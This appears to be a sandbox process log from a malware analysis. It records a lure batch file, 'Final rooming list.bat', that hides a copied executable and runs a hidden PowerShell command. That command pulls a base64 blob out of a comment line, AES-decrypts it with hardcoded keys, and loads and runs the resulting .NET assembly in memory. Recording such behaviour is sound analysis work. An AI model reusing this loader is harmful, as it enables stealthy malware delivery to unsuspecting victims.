cmd.exe "C:\Windows\System32\cmd.exe" /c start /wait "LCtKcmsKEZFv" "C:\Users\test22\AppData\Local\Temp\Final rooming list.bat"
2552cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\test22\AppData\Local\Temp\Final rooming list.bat"
2624cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\test22\AppData\Local\Temp\Final rooming list.bat"
2728attrib.exe attrib +h "C:\Users\test22\AppData\Local\Temp\Final rooming list.bat.exe"
2840Final rooming list.bat.exe "C:\Users\test22\AppData\Local\Temp\Final rooming list.bat.exe" -w hidden -c "$filePath = 'C:\Users\test22\AppData\Local\Temp\Final rooming list.bat'; $base64Pattern = '::(.*)'; $base64Code = ''; $found = $false; foreach ($line in [System.IO.File]::ReadLines($filePath)) { if ($line -match $base64Pattern) { $base64Code = $Matches[1].Trim(); $found = $true; break; } } if ($found) { $base64Code }; $key = 'S1h7yTlbJgEbe8fAoA0dwoHzF+iw98+iDWu9qKOt56s='; $iv = '9JUEq2XY9KUlMg+mRt4Zsg=='; $cryptedBytes = [System.Convert]::FromBase64String($base64Code); $aes = New-Object System.Security.Cryptography.AesCryptoServiceProvider; $aes.Key = [System.Convert]::FromBase64String($key); $aes.IV = [System.Convert]::FromBase64String($iv); $aes.Mode = [System.Security.Cryptography.CipherMode]::CBC; $aes.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7; $decryptor = $aes.CreateDecryptor(); $decryptedBytes = $decryptor.TransformFinalBlock($cryptedBytes, 0, $cryptedBytes.Length); $assembly = [System.Reflection.Assembly]::Load($decryptedBytes); $entryPoint = $assembly.EntryPoint; $null = $entryPoint.Invoke($null, @())"
2884